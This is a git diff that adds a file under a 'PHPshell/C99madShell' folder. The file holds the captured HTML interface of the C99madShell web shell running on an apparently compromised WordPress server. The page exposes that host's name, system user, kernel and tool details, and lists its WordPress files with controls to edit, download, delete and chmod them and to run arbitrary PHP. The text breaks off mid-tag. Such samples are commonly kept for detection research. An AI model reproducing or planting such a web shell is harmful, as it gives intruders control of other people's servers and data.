a/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php b/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php new file mode 100644 index 0000000..9f2b743 --- /dev/null +++ b/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php @@ -0,0 +1,327 @@ +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>thecompanyart.com - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="/wordpress/wp-xmlrpc.php"><font face="Verdana" size="5"><b>C99madShell v. 3.0 BLOG edition</b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr> +<tr><td> +<p align="left"><b>Software:&nbsp;Apache/2.0.52 (Red Hat)</b>&nbsp;</p> +<p align="left"><b>System:&nbsp;Linux thecompanyart.com 2.6.9-42.0.3.EL.wh1smp #1 SMP Fri Aug 14 15:48:17 MDT 2009 i686</b>&nbsp;</p> +<p align="left"><b>User/Group:&nbsp;anatandannie/vuser</b>&nbsp;</p><p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u>5.2.6</u></b></a> +<p align="left"><b>Php modules:&nbsp; +<font title="libxml,xsl,xmlwriter,xmlrpc,dom,xmlreader,xml,tokenizer,session,pcre,SimpleXML,SPL,PDO,sockets,soap,SQLite,standard,Reflection,pspell,posix,pgsql,pdo_sqlite,pdo_pgsql,pdo_mysql,mysqli,mysql,mssql,mhash,mcrypt,mbstring,ldap,json,imap,iconv,hash,gmp,gettext,gd,ftp,filter,exif,dbase,dba,date,curl,ctype,calendar,bz2,bcmath,zlib,openssl,apache2handler,magickwand,Zend Optimizer">mysql, mysqli, ftp, curl, imap, sockets, mssql</font></b>&nbsp;</p> +<p align="left" style="color:red"><b>Disable functions:&nbsp;passthru, proc_open, shell_exec, system</b></p><p align="left"><b>Install program:&nbsp;<font color="#00CCFF"><font title="/usr/bin/php">php</font>, <font title="/usr/bin/perl">perl</font>, <font title="/usr/bin/make">make</font>, <font title="/bin/tar">tar</font>, <font title="/usr/bin/wget">wget</font>, <font title="/usr/bin/lynx">lynx</font>, <font title="/usr/bin/curl">curl</font>, <font title="/usr/bin/lwp-mirror">lwp-mirror</font>, <font title="/usr/bin/lwp-download">lwp-download</font></font></b></p><p align="left"><b>Allow_url_fopen:&nbsp;<font color="green">ON</font></b></p> +<p align="left"><b>Allow_url_include:&nbsp;<font color="red">OFF</font></b></p> +<p align="left"><b>Safe-mode:&nbsp;<font color=green>OFF (not secure)</font></b></p> +<p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value='ls';document.todo.wp_path.value=document.getElementById('wp_pat').value;document.todo.submit();"></p><p align="left"><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2F';document.todo.sort.value='0a';document.todo.submit();"><b>/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2F';document.todo.sort.value='0a';document.todo.submit();"><b>var/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2F';document.todo.sort.value='0a';document.todo.submit();"><b>www/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2F';document.todo.sort.value='0a';document.todo.submit();"><b>html/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0a';document.todo.submit();"><b>wordpress/</b></a>&nbsp;&nbsp;&nbsp;<b><font color=green>drwxr-xr-x</font></b><br><a href="#" onclick="document.todo.act.value='search';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b><hr>Search</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="document.todo.act.value='eval';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b>PHP-code</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="document.todo.act.value='selfremove';document.todo.submit();"><b>Self remove</b></a>&nbsp;&nbsp;&nbsp;&nbsp;</p></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><center><b>Listing folder (28 files and 4 folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name="ls_form"><input type=hidden name=act value=ls><input type=hidden name=d value=/var/www/html/wordpress/><tr> +<td><b>Name</b><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0d;document.todo.submit();"></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='1a';document.todo.submit();"><b>Size</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='2a';document.todo.submit();"><b>Modify</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='3a';document.todo.submit();"><b>Owner/Group</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='4a';document.todo.submit();"><b>Perms</b></a></td> +<td><b>Action</b></td> +</tr> +<tr> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml';document.todo.sort.value='0a';document.todo.submit();">..</a></td> +<td>LINK</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();">11.10.2009 12:14:52</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/wordpress/.."></td> +</tr> +<tr> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.sort.value='0a';document.todo.submit();">.</a></td> +<td>LINK</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();">14.01.2010 11:48:42</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" onclick="ls_reverse_all();"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-admin';document.todo.sort.value='0a';document.todo.submit();">[wp-admin]</a></td> +<td>DIR</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();">21.07.2009 01:20:14</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/wordpress/wp-admin"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content';document.todo.sort.value='0a';document.todo.submit();">[wp-content]</a></td> +<td>DIR</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();">14.01.2010 10:59:59</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox2" value="/var/www/html/wordpress/wp-content"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content-new';document.todo.sort.value='0a';document.todo.submit();">[wp-content-new]</a></td> +<td>DIR</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();">05.02.2009 18:09:15</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox3" value="/var/www/html/wordpress/wp-content-new"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-includes';document.todo.sort.value='0a';document.todo.submit();">[wp-includes]</a></td> +<td>DIR</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();">27.11.2009 23:30:49</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox4" value="/var/www/html/wordpress/wp-includes"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='.htaccess';document.todo.submit();">.htaccess</a></td> +<td>301 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();">01.09.2009 09:30:43</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox5" value="/var/www/html/wordpress/.htaccess"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='clear.js';document.todo.submit();">clear.js</a></td> +<td>1.02 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();">12.01.2010 03:48:34</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox6" value="/var/www/html/wordpress/clear.js"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='index.php';document.todo.submit();">index.php</a></td> +<td>397 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox7" value="/var/www/html/wordpress/index.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='license.txt';document.todo.submit();">license.txt</a></td> +<td>15.05 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();">04.11.2009 16:49:41</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox8" value="/var/www/html/wordpress/license.txt"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='readme.html';document.todo.submit();">readme.html</a></td> +<td>7.46 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox9" value="/var/www/html/wordpress/readme.html"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-app.php';document.todo.submit();">wp-app.php</a></td> +<td>39.82 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();">04.11.2009 16:49:39</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox10" value="/var/www/html/wordpress/wp-app.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-atom.php';document.todo.submit();">wp-atom.php</a></td> +<td>541 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox11" value="/var/www/html/wordpress/wp-atom.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-blog-header.php';document.todo.submit();">wp-blog-header.php</a></td> +<td>293 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();">27.11.2009 23:27:51</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();"><b><font color=green>-rwxr-xr-x</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox12" value="/var/www/html/wordpress/wp-blog-header.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-comments-post.php';document.todo.submit();">wp-comments-post.php</a></td> +<td>3.56 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox13" value="/var/www/html/wordpress/wp-comments-post.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">wp-commentsrss2.php</a></td> +<td>238 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">04.11.2009 16:49:39</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox14" value="/var/www/html/wordpress/wp-commentsrss2.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config-sample.php';document.todo.submit();">wp-config-sample.php</a></td> +<td>2.56 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 